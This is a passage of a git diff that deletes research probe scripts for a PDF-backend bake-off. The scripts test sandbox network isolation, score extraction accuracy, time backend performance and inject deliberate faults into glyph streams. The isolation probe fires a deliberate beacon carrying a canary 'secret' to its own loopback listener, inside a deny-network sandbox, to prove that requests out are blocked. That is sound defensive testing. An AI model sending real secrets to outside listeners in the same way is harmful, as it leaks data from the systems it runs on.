-"""Concern C, second claim: the ENVIRONMENT cannot reach the network, not just the page. - -PRE-REGISTRATION-CONFIRMATORY.md, "Environment-level isolation, as a separate and stronger -claim". Browser policy and environment isolation support different sentences and must not -be conflated: - - browser policy "our app does not transmit through these mechanisms" - environment isolation "the process cannot reach the network at all" - -BOTH controls run inside the same invocation window, and neither alone is sufficient: - - * KNOWN-BAD INSIDE THE SANDBOX -- a deliberate beacon fired from the sandboxed process - that must NOT arrive. This is what attributes the silence to the sandbox. An - unsandboxed beacon proves only that the server works, in a different environment from - the one under test. - * OBSERVER LIVENESS OUTSIDE THE SANDBOX -- an unsandboxed beacon to the same listener in - an overlapping window that MUST arrive. Without it, "nothing received" cannot be - distinguished from a dead listener. - -A run missing either control is VOID, not a pass. - -Both beacons target our own loopback listener, so the payload is inert if the guard fails -open: the worst outcome of a broken sandbox is a request we wanted to see anyway. A third -check confirms an EXTERNAL host fails to resolve inside the sandbox, so a pass cannot come -from loopback being blocked by something other than the policy. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/confirm_isolation.py -""" - -from __future__ import annotations - -import argparse -import json -import os -import shutil -import subprocess -import sys -import threading -import time -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -PORT = 8973 -CANARY_SANDBOXED = "DELTATRACK_SECRET_isolation_sandboxed" -CANARY_LIVENESS = "DELTATRACK_SECRET_isolation_liveness" - -SANDBOX_PROFILE = """(version 1) -(allow default) -(deny network*) -""" - -WORKER = r''' -"""Runs INSIDE the sandbox. Fires the known-bad beacon, probes an external host, then does -real work -- a full PDF comparison -- which must still succeed with networking denied.""" -import hashlib, json, socket, sys, urllib.request -from pathlib import Path - -REPO = Path(sys.argv[1]) -sys.path.insert(0, str(REPO / "src")) -sys.path.insert(0, str(REPO / "docs/research/pdf-backend-bakeoff/probes")) - -out = {} - -# 1. Known-bad beacon. Must NOT reach the listener. -try: - urllib.request.urlopen( - f"http://127.0.0.1:{sys.argv[2]}/isolation-knownbad?secret={sys.argv[3]}", timeout=5 - ).read() - out["knownbad_request_raised"] = False -except Exception as exc: - out["knownbad_request_raised"] = True - out["knownbad_error"] = type(exc).__name__ - -# 2. External host. Must fail to resolve. -try: - socket.gethostbyname("www.govinfo.gov") - out["external_resolved"] = True -except Exception as exc: - out["external_resolved"] = False - out["external_error"] = type(exc).__name__ - -# 3. Real work: a full PDF comparison through the production entry point. -try: - from deltatrack.compare.pdf import compare_pdfs - v1 = (REPO / "tests/corpus/118-hr-4366/1_reported-in-house.pdf").read_bytes() - v2 = (REPO / "tests/corpus/118-hr-4366/2_engrossed-in-house.pdf").read_bytes() - canon = compare_pdfs(v1, v2) - blob = json.dumps(canon, sort_keys=True, default=str) - out["comparison_ok"] = True - out["comparison_sha256"] = hashlib.sha256(blob.encode()).hexdigest() - out["n_changes"] = len(canon.get("changes") or []) -except Exception as exc: - out["comparison_ok"] = False - out["comparison_error"] = f"{type(exc).__name__}: {exc}" - -print(json.dumps(out)) -''' - - -class Server: - def __init__(self): - self.proc = None - self.lines: list[str] = [] - - def __enter__(self): - self.proc = subprocess.Popen( - [sys.executable, str(PROBES / "serve.py"), "--port", str(PORT), "--seconds", "600"], - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - text=True, - bufsize=1, - ) - threading.Thread(target=self._drain, daemon=True).start() - for _ in range(80): - if any("listening" in x for x in self.lines): - return self - time.sleep(0.1) - raise RuntimeError("server did not start") - - def _drain(self): - for line in self.proc.stdout: - self.lines.append(line.rstrip()) - - def __exit__(self, *_e): - if self.proc: - self.proc.terminate() - self.proc.wait(timeout=10) - - def received(self, needle: str) -> bool: - return any(needle in x for x in self.lines) - - -def docker_available() -> bool: - if not shutil.which("docker"): - return False - r = subprocess.run(["docker", "info"], capture_output=True, timeout=30) - return r.returncode == 0 - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument( - "--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/confirm_isolation.json" - ) - args = ap.parse_args() - - tmp = Path(os.environ.get("CLAUDE_JOB_DIR", "/tmp")) / "tmp" - tmp.mkdir(parents=True, exist_ok=True) - profile = tmp / "nonet.sb" - profile.write_text(SANDBOX_PROFILE) - worker = tmp / "isolation_worker.py" - worker.write_text(WORKER) - - results: dict = { - "primary": "macOS sandbox-exec (deny network*)", - "canaries": {"sandboxed": CANARY_SANDBOXED, "liveness": CANARY_LIVENESS}, - } - - with Server() as server: - # Control B: observer liveness, OUTSIDE the sandbox, overlapping window. - import urllib.request - - try: - urllib.request.urlopen( - f"http://127.0.0.1:{PORT}/isolation-liveness?secret={CANARY_LIVENESS}", timeout=10 - ).read() - except Exception as exc: # noqa: BLE001 - results["liveness_request_error"] = f"{type(exc).__name__}: {exc}" - - # The run under test, carrying control A inside it. - t0 = time.perf_counter() - proc = subprocess.run( - [ - "sandbox-exec", - "-f", - str(profile), - sys.executable, - str(worker), - str(REPO), - str(PORT), - CANARY_SANDBOXED, - ], - capture_output=True, - text=True, - timeout=900, - ) - results["sandboxed_elapsed_s"] = round(time.perf_counter() - t0, 2) - results["sandboxed_returncode"] = proc.returncode - try: - results["sandboxed"] = json.loads(proc.stdout.strip().splitlines()[-1]) - except Exception: # noqa: BLE001 - results["sandboxed"] = {} - results["sandboxed_stdout"] = proc.stdout[-2000:] - results["sandboxed_stderr"] = proc.stderr[-2000:] - - time.sleep(3) - results["server_saw_liveness"] = server.received(CANARY_LIVENESS) - results["server_saw_sandboxed_knownbad"] = server.received(CANARY_SANDBOXED) - - # The unsandboxed comparison, for output identity: isolation must not change the answer. - try: - sys.path.insert(0, str(REPO / "src")) - import hashlib - - from deltatrack.compare.pdf import compare_pdfs - - canon = compare_pdfs( - (REPO / "tests/corpus/118-hr-4366/1_reported-in-house.pdf").read_bytes(), - (REPO / "tests/corpus/118-hr-4366/2_engrossed-in-house.pdf").read_bytes(), - ) - blob = json.dumps(canon, sort_keys=True, default=str) - results["unsandboxed_comparison_sha256"] = hashlib.sha256(blob.encode()).hexdigest() - except Exception as exc: # noqa: BLE001 - results["unsandboxed_comparison_error"] = f"{type(exc).__name__}: {exc}" - - sb = results.get("sandboxed", {}) - checks = { - "observer_liveness (unsandboxed beacon ARRIVED)": results.get("server_saw_liveness") is True, - "known_bad_inside_sandbox (beacon did NOT arrive)": results.get("server_saw_sandboxed_knownbad") is False, - "external_host_unresolvable_inside_sandbox": sb.get("external_resolved") is False, - "comparison_succeeded_with_network_denied": sb.get("comparison_ok") is True, - "output_identical_to_unsandboxed": ( - sb.get("comparison_sha256") is not None - and sb.get("comparison_sha256") == results.get("unsandboxed_comparison_sha256") - ), - } - results["checks"] = checks - results["verdict"] = "PASS" if all(checks.values()) else "VOID / FAIL" - - # The stronger claim, attempted rather than inferred. - if docker_available(): - results["linux_container"] = "docker daemon available -- run --network none separately" - else: - results["linux_container"] = "NOT RUN -- docker daemon unavailable at execution time" - - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - - print("\nEnvironment isolation, macOS sandbox-exec (deny network*)") - for k, v in checks.items(): - print(f" {'PASS' if v else 'FAIL'} {k}") - print(f"\nverdict: {results['verdict']}") - print(f"linux container: {results['linux_container']}") - print(f"wrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_metrics.py b/docs/research/pdf-backend-bakeoff/probes/confirm_metrics.py deleted file mode 100644 index 00a02d60..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_metrics.py +++ /dev/null @@ -1,262 +0,0 @@ -"""Concern B metrics for the confirmatory run, none of which may use PDFium as truth. - -PRE-REGISTRATION-CONFIRMATORY.md, "Concern B -- independent document accuracy". - - B1 text recovery F1 vs the XML body (existing, reused) - B2 heading-LABEL recovery F1 vs the XML tree (new at population scale) - B3a line-number self-consistency vs the document itself (new; no reference) - B5 amount -> heading association vs the XML tree (new) - B6 parent/child heading accuracy vs the XML tree (new) - -Two things this module deliberately does NOT do: - - * It never reads the incumbent. The exploratory line-number metric scored against - PDFium's own line-number set (score_phase1.score_document passes the incumbent's set - as `reference`), which makes it a parity measurement, not an accuracy one. It now - lives in Concern A. B3a replaces it with a property of the document: a page's margin - numbers must form a gap-free run, which needs no external oracle at all. - - * It never compares heading LEVELS. The two pipelines assign different level names to - the same objects -- the XML's `agency` holds "Military construction, air force", - which the PDF calls an `account` -- and a level-by-level comparison produced a false - reversal during the audit. Every heading metric here is level-agnostic by - pre-commitment. - -B2 is where "found the heading" stops. B5 and B6 exist because a backend can find every -heading and attach them all wrongly, and attachment is what puts an amount under the -right account in the financial tables. -""" - -from __future__ import annotations - -import re -import sys -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from deltatrack.bill_tree import normalize_bill # noqa: E402 -from deltatrack.formatters.canonical import _pdf_tree_payload # noqa: E402 -from deltatrack.formatters.text_serializer import build_xml_full_text # noqa: E402 -from deltatrack.parsers.pdf_anchors import extract_anchors # noqa: E402 -from deltatrack.parsers.pdf_text import pdf_full_text # noqa: E402 - -# Level-agnostic heading sets. The PDF and XML pipelines name levels differently, so the -# two sets are not the same strings -- they are the same OBJECTS on each side. -PDF_HEADING_KINDS = ("account", "agency", "grouping") -XML_HEADING_LEVELS = ("account", "agency", "heading") - -_AMOUNT = re.compile(r"\$[\d,]+(?:\.\d+)?") - - -def norm_label(s: str | None) -> str: - return " ".join((s or "").upper().replace(",", "").replace(".", "").split()) - - -def f1(hit: int, n_cand: int, n_ref: int) -> dict: - p = hit / n_cand if n_cand else 0.0 - r = hit / n_ref if n_ref else 0.0 - return { - "f1": round(2 * p * r / (p + r), 5) if (p + r) else 0.0, - "precision": round(p, 5), - "recall": round(r, 5), - "matched": hit, - "n_candidate": n_cand, - "n_reference": n_ref, - } - - -# ---------- shared tree flattening ------------------------------------------- - - -def _flatten(nodes: list[dict]) -> list[tuple[dict, list[dict]]]: - """(node, ancestors-outermost-first) for every node, depth-first.""" - out: list[tuple[dict, list[dict]]] = [] - stack: list[tuple[dict, list[dict]]] = [(n, []) for n in reversed(nodes)] - while stack: - node, anc = stack.pop() - out.append((node, anc)) - for child in reversed(node.get("children") or []): - stack.append((child, anc + [node])) - return out - - -def _heading_of(node: dict, ancestors: list[dict], levels: tuple[str, ...]) -> str | None: - """Nearest heading-ish label at or above `node`, or None.""" - for cand in [node] + list(reversed(ancestors)): - if cand.get("level") in levels and cand.get("label"): - return norm_label(cand["label"]) - return None - - -def _parent_heading_of(ancestors: list[dict], levels: tuple[str, ...]) -> str: - """Nearest heading-ish ancestor label, "" for a root-level heading.""" - for cand in reversed(ancestors): - if cand.get("level") in levels and cand.get("label"): - return norm_label(cand["label"]) - return "" - - -# ---------- XML side (the reference) ----------------------------------------- - - -def xml_reference(xml_path: Path) -> dict: - """Heading labels, amount->heading map and heading->parent map, from the XML tree. - - DeltaTrack#11 caveat travels with the caller: this reads the PARSER tree, which drops - . Documents carrying one are reported in their own stratum for B2/B5/B6 - and excluded from the primary figure. B1 is unaffected -- its reference is a raw - itertext walk that includes quoted-block text. - """ - v = normalize_bill(xml_path) - _, _, tree = build_xml_full_text(v, v) - flat = _flatten(list(tree["v1"])) - - labels: set[str] = set() - parent: dict[str, str] = {} - amounts: Counter = Counter() - assoc: Counter = Counter() - - for node, anc in flat: - lab = norm_label(node.get("label")) - if node.get("level") in XML_HEADING_LEVELS and lab: - labels.add(lab) - parent.setdefault(lab, _parent_heading_of(anc, XML_HEADING_LEVELS)) - head = _heading_of(node, anc, XML_HEADING_LEVELS) - for amt in node.get("own_amounts") or []: - amounts[amt] += 1 - if head is not None: - assoc[(amt, head)] += 1 - - return {"labels": labels, "parent": parent, "amounts": amounts, "assoc": assoc} - - -def xml_has_quoted_block(xml_path: Path) -> bool: - return "quoted-block" in xml_path.read_text(errors="ignore") - - -# ---------- PDF side (the candidate) ----------------------------------------- - - -def pdf_structure(pages) -> dict: - anchors = extract_anchors(pages) - text, offsets = pdf_full_text(pages) - nodes = _pdf_tree_payload(tuple(anchors), offsets, text) - flat = _flatten(nodes) - - labels: set[str] = set() - parent: dict[str, str] = {} - amounts: Counter = Counter() - assoc: Counter = Counter() - - for node, anc in flat: - lab = norm_label(node.get("label")) - if node.get("level") in PDF_HEADING_KINDS and lab: - labels.add(lab) - parent.setdefault(lab, _parent_heading_of(anc, PDF_HEADING_KINDS)) - head = _heading_of(node, anc, PDF_HEADING_KINDS) - for amt in node.get("own_amounts") or []: - amounts[amt] += 1 - if head is not None: - assoc[(amt, head)] += 1 - - # Anchor labels are the B2 candidate set: extract_anchors is the product's own - # heading detector, and _pdf_tree_payload can synthesize interior nodes that are not - # detected headings. Using anchors keeps B2 a measurement of detection. - anchor_labels = {norm_label(a.text) for a in anchors if a.kind in PDF_HEADING_KINDS and a.text} - - return { - "labels": anchor_labels, - "tree_labels": labels, - "parent": parent, - "amounts": amounts, - "assoc": assoc, - "n_anchors": len(anchors), - } - - -# ---------- the metrics ------------------------------------------------------- - - -def b2_heading_labels(pdf: dict, ref: dict) -> dict: - """B2 -- heading LABEL recovery. Says nothing about whether they are attached right.""" - hit = len(pdf["labels"] & ref["labels"]) - return f1(hit, len(pdf["labels"]), len(ref["labels"])) - - -def b3a_line_number_self_consistency(pages, scored_pages: set[int] | None = None) -> dict: - """B3a -- a page's recovered margin numbers must form a gap-free run. - - No external reference: GPO numbers each page's body lines from 1 upward, so - `|S| / max(S)` is 1.0 exactly when nothing is missing and nothing is invented, and it - penalizes both directions. Pages with no numbers at all (covers, tables of contents) - are scored only when another backend in the same run found numbers there -- - `scored_pages` carries that union, so a page nobody can number is not counted against - anyone, and a page one backend CAN number counts against those that cannot. - """ - per_page: dict[int, float] = {} - starts_at_one = 0 - for page in pages: - nums = {ln.line_number for ln in page.print_lines if ln.line_number is not None} - if not nums: - if scored_pages is not None and page.page_number in scored_pages: - per_page[page.page_number] = 0.0 - continue - if scored_pages is not None and page.page_number not in scored_pages: - continue - top = max(nums) - per_page[page.page_number] = len(nums) / top if top else 0.0 - if min(nums) == 1: - starts_at_one += 1 - if not per_page: - return {"score": None, "n_pages": 0, "starts_at_one_rate": None} - return { - "score": round(sum(per_page.values()) / len(per_page), 5), - "n_pages": len(per_page), - "starts_at_one_rate": round(starts_at_one / len(per_page), 5), - "worst_pages": sorted(per_page.items(), key=lambda kv: kv[1])[:5], - } - - -def numbered_pages(pages) -> set[int]: - return {p.page_number for p in pages if any(ln.line_number is not None for ln in p.print_lines)} - - -def b5_amount_association(pdf: dict, ref: dict) -> dict: - """B5 -- of the amounts BOTH sides found, how many sit under the same heading? - - Restricted to the shared amount multiset on purpose: pooling in amounts only one side - found would fold a DETECTION difference into an ASSOCIATION metric and make it - uninterpretable. Detection is B1's and Concern A's business. - """ - shared = pdf["amounts"] & ref["amounts"] - if not shared: - return {"f1": None, "n_reference": 0, "note": "no shared amounts"} - keep = set(shared) - p = Counter({k: c for k, c in pdf["assoc"].items() if k[0] in keep}) - r = Counter({k: c for k, c in ref["assoc"].items() if k[0] in keep}) - hit = sum((p & r).values()) - return f1(hit, sum(p.values()), sum(r.values())) - - -def b6_parent_child(pdf: dict, ref: dict) -> dict: - """B6 -- for headings both sides found, is the immediate heading parent the same?""" - shared = pdf["labels"] & ref["labels"] - if not shared: - return {"accuracy": None, "n": 0} - agree = sum(1 for lab in shared if pdf["parent"].get(lab, "") == ref["parent"].get(lab, "")) - return { - "accuracy": round(agree / len(shared), 5), - "n": len(shared), - "agree": agree, - "disagree_sample": sorted( - (lab, pdf["parent"].get(lab, ""), ref["parent"].get(lab, "")) - for lab in shared - if pdf["parent"].get(lab, "") != ref["parent"].get(lab, "") - )[:5], - } diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_perf.py b/docs/research/pdf-backend-bakeoff/probes/confirm_perf.py deleted file mode 100644 index b49093a2..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_perf.py +++ /dev/null @@ -1,158 +0,0 @@ -"""Concern D: performance, under a protocol that can declare its own run void. - -PRE-REGISTRATION-CONFIRMATORY.md, "Concern D -- performance". - -The exploratory gate-9 verdict for pdfminer did not reproduce: 37.9 s on first measurement, -69.2 s on re-run, against a 60 s ceiling, and the published figure turned out to be the -outlier. Nothing about that was visible from the number itself, which is why the machine -state is now part of the measurement rather than context for it. - -Frozen conditions, each of which can VOID the run rather than degrade it quietly: - - * load average < 1.0 at start, recorded with the result - * minimum of 5 trials; the MINIMUM is the estimator, not the mean - * CPU time recorded beside wall time; material divergence means contention - * one backend at a time, never concurrently - -A candidate whose min-of-5 straddles the 60 s ceiling is UNRESOLVED, never rounded to a -pass or a fail. That is the state pdfminer is in today and this protocol exists to keep it -honestly there rather than resolve it by luck. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/confirm_perf.py -""" - -from __future__ import annotations - -import argparse -import json -import os -import resource -import statistics -import sys -import time -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] - -LOAD_CEILING = 1.0 -TRIALS = 5 -GATE_D1_SECONDS = 60.0 -GATE_D2_MULTIPLE = 3.0 -LARGEST = REPO / "tests/corpus/119-hr-1/1_reported-in-house.pdf" - - -def load_average() -> tuple[float, float, float]: - return os.getloadavg() - - -def native_trial(backend: str, pdf: Path) -> dict: - """One extraction, wall and CPU time. CPU is children-inclusive: the JS backends run - in a subprocess, and charging only this process's CPU would report ~0 for them.""" - before = resource.getrusage(resource.RUSAGE_CHILDREN) - self_before = resource.getrusage(resource.RUSAGE_SELF) - t0 = time.perf_counter() - from contract import run_backend - - pages, _summary = run_backend(backend, pdf) - wall = time.perf_counter() - t0 - after = resource.getrusage(resource.RUSAGE_CHILDREN) - self_after = resource.getrusage(resource.RUSAGE_SELF) - cpu = (after.ru_utime - before.ru_utime) + (after.ru_stime - before.ru_stime) - cpu += (self_after.ru_utime - self_before.ru_utime) + (self_after.ru_stime - self_before.ru_stime) - return {"wall_s": round(wall, 3), "cpu_s": round(cpu, 3), "n_pages": len(pages)} - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/confirm_perf.json") - ap.add_argument("--trials", type=int, default=TRIALS) - ap.add_argument("--backends", default="pdfium-native,pdfium-wasm,pdfminer") - args = ap.parse_args() - - sys.path.insert(0, str(PROBES)) - - load_start = load_average() - voided = load_start[0] >= LOAD_CEILING - print(f"load average at start: {load_start[0]:.2f} (ceiling {LOAD_CEILING})", file=sys.stderr) - if voided: - print(" -> RUN IS VOID by the frozen idle-machine condition.", file=sys.stderr) - print(" Measuring anyway, and publishing it as VOID rather than as a result.", file=sys.stderr) - - results: dict = { - "document": str(LARGEST.relative_to(REPO)), - "load_average_start": list(load_start), - "load_ceiling": LOAD_CEILING, - "trials": args.trials, - "estimator": "minimum of trials", - "void": voided, - "void_reason": "load average at start >= 1.0" if voided else None, - "gates": {"D1_seconds": GATE_D1_SECONDS, "D2_multiple_of_incumbent": GATE_D2_MULTIPLE}, - "backends": {}, - } - - for backend in args.backends.split(","): - trials = [] - for i in range(args.trials): - try: - t = native_trial(backend, LARGEST) - except Exception as exc: # noqa: BLE001 - trials.append({"error": f"{type(exc).__name__}: {exc}"}) - print(f" {backend} trial {i + 1}: ERROR {exc}", file=sys.stderr) - continue - trials.append(t) - print( - f" {backend:14} trial {i + 1}/{args.trials}: wall={t['wall_s']:7.2f}s cpu={t['cpu_s']:7.2f}s", - file=sys.stderr, - ) - walls = [t["wall_s"] for t in trials if "wall_s" in t] - cpus = [t["cpu_s"] for t in trials if "cpu_s" in t] - if not walls: - results["backends"][backend] = {"trials": trials, "error": "no successful trial"} - continue - entry = { - "trials": trials, - "min_s": min(walls), - "median_s": round(statistics.median(walls), 3), - "max_s": max(walls), - "spread_s": round(max(walls) - min(walls), 3), - "min_cpu_s": min(cpus) if cpus else None, - "cpu_wall_ratio_at_min": round(min(cpus) / min(walls), 2) if cpus and min(walls) else None, - } - results["backends"][backend] = entry - - inc = results["backends"].get("pdfium-native", {}).get("min_s") - results["load_average_end"] = list(load_average()) - for backend, entry in results["backends"].items(): - if "min_s" not in entry: - continue - d1 = entry["min_s"] < GATE_D1_SECONDS - straddles = entry["min_s"] < GATE_D1_SECONDS <= entry.get("max_s", entry["min_s"]) - entry["D1"] = "UNRESOLVED (min-of-N straddles the ceiling)" if straddles else ("pass" if d1 else "fail") - if inc: - entry["D2_ratio_to_incumbent"] = round(entry["min_s"] / inc, 2) - entry["D2"] = "pass" if entry["min_s"] <= GATE_D2_MULTIPLE * inc else "fail" - if voided: - entry["D1"] = f"VOID -- {entry['D1']}" - entry["D2"] = f"VOID -- {entry.get('D2', 'n/a')}" - - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - - print(f"\n{'backend':16} {'min':>8} {'median':>8} {'max':>8} {'spread':>8} {'cpu/wall':>9} D1 / D2") - for backend, e in results["backends"].items(): - if "min_s" not in e: - print(f"{backend:16} {e.get('error')}") - continue - print( - f"{backend:16} {e['min_s']:8.2f} {e['median_s']:8.2f} {e['max_s']:8.2f} " - f"{e['spread_s']:8.2f} {e['cpu_wall_ratio_at_min'] or 0:9.2f} {e['D1']} / {e.get('D2', 'n/a')}" - ) - print(f"\nload average: start {load_start[0]:.2f} -> end {results['load_average_end'][0]:.2f}") - if voided: - print("VOID: this run does not satisfy the frozen idle-machine condition.") - print(f"wrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_sabotage.py b/docs/research/pdf-backend-bakeoff/probes/confirm_sabotage.py deleted file mode 100644 index 50440e34..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_sabotage.py +++ /dev/null @@ -1,337 +0,0 @@ -"""B0 -- per-metric sabotage controls. A metric that cannot fail cannot rank anything. - -PRE-REGISTRATION-CONFIRMATORY.md, "B0 -- harness sensitivity controls". - -One uniform glyph dropout is not a sufficient control. It garbles text (so B1 falls) but -barely disturbs where a heading sits (so B5 need not move), and a metric that survives it -may be blind rather than robust -- voiding it on that evidence would be its own false -negative. So each metric gets a sabotage that injects the specific fault that metric -claims to catch, applied to a candidate's glyph stream with seed 20260805. - - S1 B1 delete 5% of glyphs, uniformly at random - S2 B2 collapse the small-caps size band on heading lines - S3 B3a delete the margin-number glyph run on 5% of numbered lines - S4 B5 move heading lines down one line-height -- text intact, attachment wrong - S5 B6 delete agency headings only, so their children reparent - SA1 A1 perturb one digit of one amount - SA2 A2 delete one printed line's glyphs - SA3 A4 delete a single glyph - -S4 and S5 carry SEPARABILITY requirements, and those are the point rather than -decoration. S4 leaves every heading label intact and only moves where it sits: if B2 -falls as far as B5 does, B2 and B5 are measuring the same thing and the association -metric adds nothing. Same for S5 against B6. That verdict -- "not separable" -- is a -different finding from either metric being blind, and must not be written as one. -""" - -from __future__ import annotations - -import random -import re -import statistics -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import reconstruct as R # noqa: E402 -from contract import BASELINE, CP, SIZE, X0, Y0, Y1, PdfPage # noqa: E402 - -SEED = 20260805 -_NUMBERED = re.compile(r"^(\d{1,2}) ") - - -def _clone(pages: list[PdfPage]) -> list[PdfPage]: - return [PdfPage(page_number=p.page_number, width=p.width, height=p.height, glyphs=list(p.glyphs)) for p in pages] - - -def _rows(page: PdfPage) -> list[list]: - """Baseline-clustered rows, memoized ON the page object. - - Cached as an attribute rather than in a module dict keyed by id(): a freed page's id - can be reused by a later one, which would silently serve another document's rows. The - attribute lives and dies with the object it describes. Every sabotage clusters the - same pages, and clustering is O(n log n) over ~3M glyphs on the largest bill. - """ - cached = getattr(page, "_rows_cache", None) - if cached is not None and cached[0] == len(page.glyphs): - return cached[1] - rows = R.cluster_lines(page) - page._rows_cache = (len(page.glyphs), rows) - return rows - - -_SMALLCAPS_LO, _SMALLCAPS_HI = 0.70, 0.90 - - -def _heading_rows(page: PdfPage) -> list[list]: - """Rows carrying GPO's faux small-caps signal: two sizes inside ONE printed line. - - Measured, not assumed. On 118-hr-4366 the body face is 14pt and an account heading is - 14pt initials with an 11.2pt body -- a ratio of exactly 0.800 -- and those heading - lines are the only non-chrome rows on their page carrying more than one size. - - An earlier version of this function looked for a size step UP against the page's - dominant size, which is backwards: the heading's small caps are SMALLER than the body - face, so it matched nothing, S2/S4 silently became no-ops, and their metrics would - have been declared void on a harness bug rather than on a blind metric. That is the - exact failure B0 exists to catch, and here it caught the control itself. - """ - rows = _rows(page) - if not rows: - return [] - body = R._dominant_size(rows) - out = [] - for row in rows: - sizes = sorted({round(g[SIZE], 1) for g in row}) - if len(sizes) < 2: - continue - if not (_SMALLCAPS_LO <= sizes[0] / sizes[-1] <= _SMALLCAPS_HI): - continue - if R.is_chrome(R._line_text(row), row, body): - continue - out.append(row) - return out - - -def _line_height(page: PdfPage) -> float: - rows = _rows(page) - baselines = sorted({round(row[0][BASELINE], 2) for row in rows if row}, reverse=True) - gaps = [a - b for a, b in zip(baselines, baselines[1:], strict=False) if 4.0 < a - b < 30.0] - return statistics.median(gaps) if gaps else 12.0 - - -# ---------- Concern B sabotages ---------------------------------------------- - - -def s1_drop_glyphs(pages: list[PdfPage], rate: float = 0.05) -> list[PdfPage]: - """S1 (targets B1): uniform glyph dropout. Garbles tokens; leaves layout alone.""" - rng = random.Random(SEED) - out = _clone(pages) - for page in out: - page.glyphs = [g for g in page.glyphs if rng.random() >= rate] - return out - - -def s2_collapse_size_band(pages: list[PdfPage]) -> list[PdfPage]: - """S2 (targets B2): flatten every heading line to one size. - - This is the real PDF.js failure mode, not an invented one: `getTextContent()` merges - the alternating 14pt/11.2pt runs of a small-caps heading and reports a single size, so - the band ADR 0012's heading recovery reads collapses. Reproducing it deliberately is - what proves B2 can see it. - """ - out = _clone(pages) - for page in out: - med = {} - for row in _heading_rows(page): - m = statistics.median([g[SIZE] for g in row]) - for g in row: - med[id(g)] = m - if not med: - continue - page.glyphs = [(g[:SIZE] + (med[id(g)],) + g[SIZE + 1 :]) if id(g) in med else g for g in page.glyphs] - return out - - -def s3_drop_margin_numbers(pages: list[PdfPage], rate: float = 0.05) -> list[PdfPage]: - """S3 (targets B3a): delete the leading margin-number glyphs on some numbered lines.""" - rng = random.Random(SEED) - out = _clone(pages) - for page in out: - drop: set[int] = set() - for row in _rows(page): - text = R._line_text(row) - if not _NUMBERED.match(text): - continue - if rng.random() >= rate: - continue - ordered = sorted(row, key=lambda g: g[X0]) - for g in ordered: - if chr(g[CP]).isdigit(): - drop.add(id(g)) - elif drop: - break - if drop: - page.glyphs = [g for g in page.glyphs if id(g) not in drop] - return out - - -def s4_rotate_heading_slots(pages: list[PdfPage]) -> list[PdfPage]: - """S4 (targets B5): give each heading the NEXT heading's slot, cyclically. - - The purest attachment-only fault available. Every heading keeps its exact glyphs, and - every heading still lands where a heading was, so detection is untouched; all that - changes is which block each one precedes. B5 must fall; B2 should barely move. - - Two earlier designs are recorded because each failed for a reason worth keeping: - - * shift heading lines down one line-height -- drops them into the next line's - baseline cluster and garbles both lines. B1 fell 0.108 and B2 0.443 against B5's - 0.461: it corrupted the document rather than its structure. - * swap each heading with the row below it -- cleaner, but the row below is usually - a body line of the heading's OWN block, so the heading lands mid-sentence and - stops being detected. B2 moved 0.053 against a 0.020 separability rule. - - This is the last revision of S4. If separability still fails over the population, the - verdict is NOT SEPARABLE and it is reported as such rather than tuned away. - """ - out = _clone(pages) - slots: list[tuple[int, float, list]] = [] - for pi, page in enumerate(out): - for row in _heading_rows(page): - if row: - slots.append((pi, row[0][BASELINE], row)) - if len(slots) < 2: - return out - - moves: list[tuple[int, float, list]] = [] - for i, (_pi, base, row) in enumerate(slots): - tpi, tbase, _ = slots[(i + 1) % len(slots)] - moves.append((tpi, tbase - base, row)) - - victims = {id(g) for _t, _d, row in moves for g in row} - for page in out: - page.glyphs = [g for g in page.glyphs if id(g) not in victims] - for tpi, delta, row in moves: - out[tpi].glyphs.extend( - g[:Y0] + (g[Y0] + delta, g[Y0 + 1], g[Y1] + delta, g[BASELINE] + delta) + g[BASELINE + 1 :] for g in row - ) - return out - - -def s2b_delete_heading_lines(pages: list[PdfPage], rate: float = 0.20) -> list[PdfPage]: - """S2b (targets B2): delete a fraction of heading lines outright. - - The direct injection of the fault B2 names -- "this backend did not recover the - heading label". S2's size-band collapse is kept alongside it because its RESULT is - informative (see its docstring), but a metric must be controlled against the fault it - claims to catch, not only against one mechanism that could cause it. - """ - rng = random.Random(SEED) - out = _clone(pages) - for page in out: - drop: set[int] = set() - for row in _heading_rows(page): - if rng.random() < rate: - drop.update(id(g) for g in row) - if drop: - page.glyphs = [g for g in page.glyphs if id(g) not in drop] - return out - - -def s5_drop_agency_headings(pages: list[PdfPage]) -> list[PdfPage]: - """S5 (targets B6): delete agency headings only, so accounts reparent upward. - - Two-pass: reconstruct the clean pages to find which printed lines the product calls - `agency`, then delete those lines' glyphs from the raw stream. Levels come from the - product's own detector, so the sabotage removes what B6 is about rather than what a - heuristic guesses. - """ - from deltatrack.parsers.pdf_anchors import extract_anchors - - clean, _ = R.reconstruct(pages, repaired=True) - victims = { - (a.page_number, a.line_number) - for a in extract_anchors(clean) - if a.kind == "agency" and a.line_number is not None - } - if not victims: - return _clone(pages) - - out = _clone(pages) - for page in out: - want = {ln for (pn, ln) in victims if pn == page.page_number} - if not want: - continue - # Locate the row by its own printed margin number 